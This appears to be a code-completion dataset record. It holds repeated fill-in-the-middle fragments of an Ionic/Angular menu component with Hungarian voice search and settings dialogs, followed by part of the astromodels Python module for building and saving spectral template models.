cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| this.openSpeech();
}
| conditional_block |
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) |
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| {
this.iab.create( url, '_system' );
} | identifier_body |
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2"); | });
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
} | this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh(); | random_line_split |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
